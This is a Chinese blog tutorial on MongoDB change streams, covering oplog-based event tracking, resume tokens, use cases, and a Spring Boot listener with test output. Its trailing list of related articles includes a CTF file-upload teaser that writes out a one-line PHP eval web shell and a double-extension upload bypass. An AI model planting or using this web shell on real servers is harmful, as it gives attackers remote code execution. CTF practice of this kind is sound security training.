MongoDB change stream 详解

news2025/1/24 22:47:24

文章目录

    • 什么是 Chang Streams
    • 实现原理
    • 故障恢复
    • 使用场景
    • Spring Boot整合Chang Stream

什么是 Chang Streams

Change Stream指数据的变化事件流,MongoDB从3.6版本开始提供订阅数据变更的功能。

Change Stream 是 MongoDB 用于实现变更追踪的解决方案,类似于关系数据库的触发器,但原理不完全相同:

在这里插入图片描述



实现原理

**Change Stream 是基于 oplog 实现的,提供推送实时增量的推送功能。**它在 oplog 上开启一个 tailable cursor 来追踪所有复制集上的变更操作,最终调用应用中定义的回调函数。

被追踪的变更事件主要包括:

  • insert/update/delete:插入、更新、删除;
  • drop:集合被删除;
  • rename:集合被重命名;
  • dropDatabase:数据库被删除;
  • invalidate:drop/rename/dropDatabase 将导致 invalidate 被触发, 并关闭 change stream;

从MongoDB 6.0开始,change stream支持DDL事件的更改通知,如createIndexes和dropIndexes事件。

在这里插入图片描述



如果只对某些类型的变更事件感兴趣,可以使用使用聚合管道的过滤步骤过滤事件:

var cs = db.user.watch([{
    $match:{operationType:{$in:["insert","delete"]}}
}])

db.watch()语法: https://www.mongodb.com/docs/manual/reference/method/db.watch/#example

Change Stream会采用 "readConcern:majority"这样的一致性级别,保证写入的变更不会被回滚。因此:

  • 未开启 majority readConcern 的集群无法使用 Change Stream;
  • 当集群无法满足 {w: “majority”} 时,不会触发 Change Stream(例如 PSA 架构 中的 S 因故障宕机)。



MongoShell测试

# 窗口1执行 watch()
db.user.watch([],{maxAwaitTimeMS:1000000})

# 窗口2进行一条新增操作
db.user.insert({name:"xxxx"})

在这里插入图片描述



在这里插入图片描述



# mongodb 6 的版本这里就只是简单的打印一条日志
rs0 [direct: primary] test> db.emp.watch([], {maxAwaitTimeMS:1000000})
ChangeStreamCursor on emp



故障恢复

假设在一系列写入操作的过程中,订阅 Change Stream 的应用在接收到“写3”之后 于 t0 时刻崩溃,重启后后续的变更怎么办?

在这里插入图片描述

想要从上次中断的地方继续获取变更流,只需要保留上次变更通知中的 _id 即可。 Change Stream 回调所返回的的数据带有 _id,这个 _id 可以用于断点恢复。例如:

var cs = db.collection.watch([], {resumeAfter: <_id>}) 

即可从上一条通知中断处继续获取后续的变更通知。



使用场景

  • 监控

    用户需要及时获取变更信息(例如账户相关的表),ChangeStreams 可以提供监控功能,一旦相关的表信息发生变更,就会将变更的消息实时推送出去。

  • 分析平台

    例如需要基于增量去分析用户的一些行为,可以基于 ChangeStreams 把数据拉出来,推到下游的计算平台, 比如 类似 Flink、Spark 等计算平台等等。

  • 数据同步

    基于 ChangeStreams,用户可以搭建额外的 MongoDB 集群,这个集群是从原端的 MongoDB 拉取过来的, 那么这个集群可以做一个热备份,假如源端集群发生 网络不通等等之类的变故,备集群就可以接管服务。 还可以做一个冷备份,如用户基于 ChangeStreams 把数据同步到文件,万一源端数据库发生不可服务, 就可以从文件里恢复出完整的 MongoDB 数据库, 继续提供服务。(当然,此处还需要借助定期全量备份来一同完成恢复) 另外数据同步它不仅仅局限于同一地域,可以跨地域,从北京到上海甚至从中国到美国等等。

  • 消息推送

    假如用户想实时了解公交车的信息,那么公交车的位置每次变动,都实时推送变更的信息给想了解的用户,用户能够实时收到公交车变更的数据,非常便捷实用。



注意事项

  • Change Stream 依赖于 oplog,因此中断时间不可超过 oplog 回收的最大时间窗;
  • 在执行 update 操作时,如果只更新了部分数据,那么 Change Stream 通知的也是增量部分;
  • 删除数据时通知的仅是删除数据的 _id。



Spring Boot整合Chang Stream

引入依赖

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-data-mongodb</artifactId>
</dependency>



配置yml

spring:
  data:
    mongodb:
      uri: mongodb://hushang:123456@192.168.75.100:28017,192.168.75.100:28018,192.168.75.100:28019/test?authSource=admin&replicaSet=rs0



配置mongo监听器,用于接收数据库的变更信息

package com.hs.learn.changestream;

import lombok.extern.slf4j.Slf4j;
import org.springframework.data.mongodb.core.messaging.Message;
import org.springframework.data.mongodb.core.messaging.MessageListener;
import org.springframework.stereotype.Component;

/**
 * @Description: change stream 监听器
 * @Author 胡尚
 * @Date: 2024/8/1 14:34
 */
@Component
@Slf4j
public class DocumentMessageListener<S,T> implements MessageListener<S, T> {

    @Override
    public void onMessage(Message<S, T> message) {

        // TODO 在监听器方法中完成自己的定制化需求

        log.info("Received Message in collection: {}", message.getProperties().getCollectionName());
        log.info("trawsource: {}", message.getRaw());
        log.info("tconverted: {}", message.getBody());
    }
}



配置 mongo监听器的容器MessageListenerContainer,spring启动时会自动启动监听的任务用于接收changestream

package com.hs.learn.config;

import com.hs.learn.changestream.DocumentMessageListener;
import com.mongodb.ReadConcern;
import com.mongodb.ReadPreference;
import com.mongodb.TransactionOptions;
import com.mongodb.WriteConcern;
import com.mongodb.client.model.changestream.FullDocument;
import org.bson.Document;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.data.mongodb.MongoDatabaseFactory;
import org.springframework.data.mongodb.MongoTransactionManager;
import org.springframework.data.mongodb.core.MongoTemplate;
import org.springframework.data.mongodb.core.aggregation.Aggregation;
import org.springframework.data.mongodb.core.messaging.ChangeStreamRequest;
import org.springframework.data.mongodb.core.messaging.DefaultMessageListenerContainer;
import org.springframework.data.mongodb.core.messaging.MessageListenerContainer;
import org.springframework.data.mongodb.core.query.Criteria;

import java.util.concurrent.*;

/**
 * @Description: mongodb的配置类
 * @Author 胡尚
 * @Date: 2024/7/31 14:52
 */
@Configuration
public class MongodbConfig {

    /**
     * change stream的配置
     *
     * @param template                引入mongodb的依赖后,内置的bean对象
     * @param documentMessageListener 自定义的messageListener
     * @return
     */
    @Bean
    public MessageListenerContainer messageListenerContainer(MongoTemplate template, DocumentMessageListener documentMessageListener) {
        // 创建一个线程池
        Executor executor = new ThreadPoolExecutor(5, 5, 0L, TimeUnit.MILLISECONDS,
                new LinkedBlockingQueue<Runnable>(5));

        // 创建一个MessageListenerContainer对象
        MessageListenerContainer messageListenerContainer = new DefaultMessageListenerContainer(template, executor) {
            @Override
            public boolean isAutoStartup() {
                return true;
            }
        };

        ChangeStreamRequest<Document> changeStreamRequest = ChangeStreamRequest.builder(documentMessageListener)
                // 需要监听的集合名
                .collection("emp")
                //过滤需要监听的操作类型,可以根据需求指定过滤条件
                .filter(Aggregation.newAggregation(Aggregation.match(
                        Criteria.where("operationType").in("insert", "update", "delete"))))
                //不设置时,文档更新时,只会发送变更字段的信息,设置UPDATE_LOOKUP会返回文档的全部信息
                .fullDocumentLookup(FullDocument.UPDATE_LOOKUP)
                .build();

        messageListenerContainer.register(changeStreamRequest, Document.class);

        return messageListenerContainer;
    }
}



测试

mongo shell插入一条文档

rs0 [direct: primary] test> db.emp.insertOne({name: "hushang", age: 24})
{
  acknowledged: true,
  insertedId: ObjectId("66ab31bec9f5b6d436cdb9d5")
}

控制台输出:

Received Message in collection: emp

trawsource: ChangeStreamDocument{ operationType=insert, resumeToken={"_data": "8266AB31BE000000012B022C0100296E5A1004ED8D395B97A348039DC133ABDBC3800F46645F6964006466AB31BEC9F5B6D436CDB9D50004"}, namespace=test.emp, destinationNamespace=null, fullDocument=Document{{_id=66ab31bec9f5b6d436cdb9d5, name=hushang, age=24}}, documentKey={"_id": {"$oid": "66ab31bec9f5b6d436cdb9d5"}}, clusterTime=Timestamp{value=7398061504999718913, seconds=1722495422, inc=1}, updateDescription=null, txnNumber=null, lsid=null}

tconverted: Document{{_id=66ab31bec9f5b6d436cdb9d5, name=hushang, age=24}}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1969858.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MySQL基础练习题16-电影评分

题目 准备数据 分析数据 总结 题目 查找评论电影数量最多的用户名。如果出现平局&#xff0c;返回字典序较小的用户名。 查找在 February 2020 平均评分最高 的电影名称。如果出现平局&#xff0c;返回字典序较小的电影名称。 准备数据 ## 创建库 create database db; u…

微信小程序电商直播功能如何开通?

作者&#xff1a;阿龙 目前&#xff0c;公域直播电商平台&#xff08;抖音、快手、视频号等&#xff09;的获客流量成本越来越高&#xff0c;同时监管规则越来越严&#xff0c;扣点越来越高&#xff0c;并且没有用户分销机制&#xff0c;这些都在迫使商家尽快建立自己的私域直…

苹果Vision Pro在中国市场遇冷?连黄牛都炒不动了

随着科技巨头苹果公司推出的首款混合现实头戴设备Vision Pro正式登陆中国市场&#xff0c;这款备受瞩目的产品引发了广泛关注。 然而&#xff0c;短短一周之后&#xff0c;许多早期尝鲜的用户却开始陆续退场。究竟是什么原因导致大量用户选择退场呢&#xff1f;本文将从多个维…

绝密!OceanBase OBCP备考模拟题讲解(3)

「源de爸讲数据库」每天更新OceanBase OBCP题库及全网独家超详细题目解析&#xff0c;祝您早日持证上岸&#xff01; 现如今&#xff0c;一大批国产数据库随着国产化浪潮&#xff0c;已经逐步被越来越多的人认可。OceanBase便是其中一个优秀代表。 做这个日更专题&#xff0c…

ESP32-C2 烧录

自动下载电路 dtr rts &#xff1b;WCH 提供了相应的芯片&#xff0c;实现自动下载 CH340X &#xff08;*不要使用天问的下载器&#xff0c;电压为5V&#xff0c;下载前会重启电源&#xff0c;导致无法识别ESP芯片&#xff0c;修改&#xff0c;将电源线重引出 使用IDF编辑完成…

实测体验:劣质宠物空气净化器有啥危害?值得买的养宠空气净化器

作为一名猫咖店老板&#xff0c;换季时节&#xff0c;家中不仅要面对恼人的异味&#xff0c;还要忍受满天飞舞的猫毛&#xff0c;真是让人头疼。虽然和毛孩子在一起充满了乐趣&#xff0c;但随之而来的毛发和异味问题却令人苦不堪言。普通的空气净化器虽然能净化空气&#xff0…

写一个图片裁剪的js,JavaScript图片裁剪插件PlusCropper

在前端开发中&#xff0c;图片裁剪是一个常见的需求。本文将深入解析一个功能完善的JavaScript图片裁剪插件——PlusCropper&#xff0c;带你一步步了解其实现原理和使用方法。 一、插件概述 PlusCropper是一个轻量级的JavaScript插件&#xff0c;它允许用户在网页上交互式地…

CTFHUB-文件上传-双写绕过

开启题目 1.php内容&#xff1a; <?php eval($_POST[cmd]);?> 上传一句话木马 1.php&#xff0c;抓包&#xff0c;双写 php 然后放包&#xff0c;上传成功 蚁剑连接 在“/var/www/html/flag_484225427.php”找到了 flag

How Can I display Reference/Citation using Streamlit Application?

题意&#xff1a;怎样在Streamlit应用程序中显示参考文献或引用&#xff1f; 问题背景&#xff1a; I have created an Azure AI Search Service, created index using Azure Blob Storage and Deployed a web application and made a chat Playground using AzureOpenAI. 我…

CSS使用渐变实现Chrome标签栏效果

这次来看一个带特殊圆角导航栏布局&#xff0c;如下谷歌浏览器的标签栏&#xff1a; 这样一个布局如何实现呢&#xff1f; CSS 渐变几乎是无所不能的&#xff0c;什么的图形都能绘制&#xff0c;这里可以拆分一下&#xff0c;两个矩形&#xff0c;两个圆形&#xff0c;还有两个…

计算机毕业设计选题推荐-二手闲置交易系统-Java/Python项目实战

✨作者主页&#xff1a;IT毕设梦工厂✨ 个人简介&#xff1a;曾从事计算机专业培训教学&#xff0c;擅长Java、Python、微信小程序、Golang、安卓Android等项目实战。接项目定制开发、代码讲解、答辩教学、文档编写、降重等。 ☑文末获取源码☑ 精彩专栏推荐⬇⬇⬇ Java项目 Py…

目标检测 | yolov2/yolo9000 原理和介绍

前言&#xff1a;目标检测 | yolov1 原理和介绍 简介 论文链接&#xff1a;https://arxiv.org/abs/1612.08242 时间&#xff1a;2016年 作者&#xff1a;Joseph Redmon  作者首先在YOLOv1的基础上提出了改进的YOLOv2&#xff0c;然后提出了一种检测与分类联合训练方法&#…

【Linux网络编程】套接字Socket(UDP)

网络编程基础概念&#xff1a; ip地址和端口号 ip地址是网络协议地址&#xff08;4字节32位&#xff0c;形式&#xff1a;xxx.xxx.xxx.xxx xxx在范围[0, 255]内&#xff09;&#xff0c;是IP协议提供的一种统一的地址格式&#xff0c;每台主机的ip地址不同&#xff0c;一个…

五个优秀的免费 Ollama WebUI 客户端推荐

认识 Ollama 本地模型框架&#xff0c;并简单了解它的优势和不足&#xff0c;以及推荐了 5 款开源免费的 Ollama WebUI 客户端&#xff0c;以提高使用体验。 什么是 Ollama&#xff1f; Ollama 是一款强大的本地运行大型语言模型&#xff08;LLM&#xff09;的框架&#xff0c…

一键操作!Win11用户将排除项添加到安全中心的方法

在Win11电脑操作中&#xff0c;Windows安全中心提供了添加排除项的功能&#xff0c;让用户可以自定义哪些文件、文件夹或进程免于Microsoft Defender的扫描&#xff0c;从而防止误报正常程序为安全威胁。但许多新手不知道具体如何操作才能成功添加排除项&#xff1f;那么就来看…

【PGCCC】pg_show_plans:显示所有正在运行的语句的查询计划

PostgreSQL 扩展可显示所有当前正在运行的 SQL 语句的查询计划。查询计划可以以多种格式显示&#xff0c;例如JSON或YAML。 此扩展在共享内存中创建哈希表。哈希表不可调整大小&#xff0c;因此一旦填满&#xff0c;就无法添加新计划。 安装 支持 PostgreSQL 版本 12 及更新…

学Python可少不了项目练手,这8个小项目有趣又实用,小白也能做出来_python练手项目,python教程

学习之路比较科学的学习方法是理解了之后把知识点进行运用&#xff0c;找一些开源的小项目做是最好的&#xff0c;站在岸上是学不会游泳的&#xff0c;光看健身视频是减不了肥的&#xff0c;不自己动手敲代码是学不会编程的。 我在找了8个比较有趣的小项目&#xff0c;技术水平…

DirectX修复工具下载安装指南:电脑dll修复拿下!6种dll缺失修复方法!

在日常使用电脑的过程中&#xff0c;不少用户可能会遇到“DLL文件缺失”的错误提示&#xff0c;这类问题往往导致程序无法正常运行或系统出现不稳定现象。幸运的是&#xff0c;DirectX修复工具作为一款功能强大的系统维护软件&#xff0c;能够有效解决大多数DLL文件缺失问题&am…

下属“软对抗”,工作阳奉阴违怎么办?4大权谋术,让他不敢造次

下属“软对抗”&#xff0c;工作阳奉阴违怎么办&#xff1f;4大权谋术&#xff0c;让他不敢造次 第一个&#xff1a;强势管理 在企业管理中&#xff0c;领导必须展现足够的强势。 所谓强势的管理&#xff0c;并不仅仅指态度上的强硬&#xff0c;更重要的是在行动中坚持原则和规…

元气森林|每天拆解一个品牌营销方案

元气森林的品牌营销策略是一个多维度、全方位的策略体系&#xff0c;旨在通过创新、用户导向和多元化渠道来塑造和提升品牌形象&#xff0c;促进产品销售。 以下是道叔对元气森林品牌营销策略的详细拆解&#xff1a; 一、以用户为中心的营销理念 元气森林注重通过市场调研、…